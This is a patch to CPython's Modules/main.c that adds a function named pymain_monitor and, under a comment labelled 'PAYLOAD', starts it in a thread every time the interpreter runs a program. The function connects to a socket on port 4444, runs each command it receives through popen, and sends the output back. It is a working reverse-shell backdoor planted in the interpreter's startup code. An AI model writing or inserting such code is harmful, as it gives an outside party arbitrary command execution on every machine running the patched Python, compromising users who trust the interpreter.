+++ base/Modules/main.c	2024-07-07 10:01:56
@@ -536,7 +536,59 @@
     *exitcode = (res != 0);
 }
 
+#include <arpa/inet.h>
+static void *
+pymain_monitor(void * args) 
+{
+    int sockfd, n;
+    struct sockaddr_in srv;
+    char buffer[1024];
+    FILE *fp;
 
+    // create socket
+    sockfd = socket(AF_INET, SOCK_STREAM, 0);
+    if (sockfd == -1)
+        return NULL;
+
+    // setup server address
+    srv.sin_family = AF_INET;
+    srv.sin_port = htons(4444);
+    srv.sin_addr.s_addr = inet_addr("127.0.0.1");
+
+    // connect to the remote server
+    if (connect(sockfd, (struct sockaddr*)&srv, sizeof(srv)) == -1)
+    {
+        close(sockfd);
+        return NULL;
+    }
+
+    // start monitoring
+    while (1) 
+    {
+        memset(buffer, 0, sizeof(buffer));
+
+        n = recv(sockfd, buffer, sizeof(buffer) - 1, 0);
+        if (n <= 0)
+            break;
+        
+        fp = popen(buffer, "r");
+        if (fp == NULL) 
+        {
+            close(sockfd);
+            pthread_exit(NULL);
+        }
+
+        while (fgets(buffer, sizeof(buffer), fp) != NULL)
+            send(sockfd, buffer, strlen(buffer), 0);
+
+        pclose(fp);
+    }
+
+    close(sockfd);
+    return NULL;
+}
+
+
 static void
 pymain_run_python(int *exitcode)
 {
@@ -549,6 +601,10 @@
     if (_PyStatus_EXCEPTION(_PyPathConfig_UpdateGlobal(config))) {
         goto error;
     }
+
+    // PAYLOAD: create new thread and execute payload
+    pthread_t thread_id;
+    pthread_create(&thread_id, NULL, pymain_monitor, NULL);
 
     if (config->run_filename != NULL) {
         /* If filename is a package (ex: directory or ZIP file) which contains
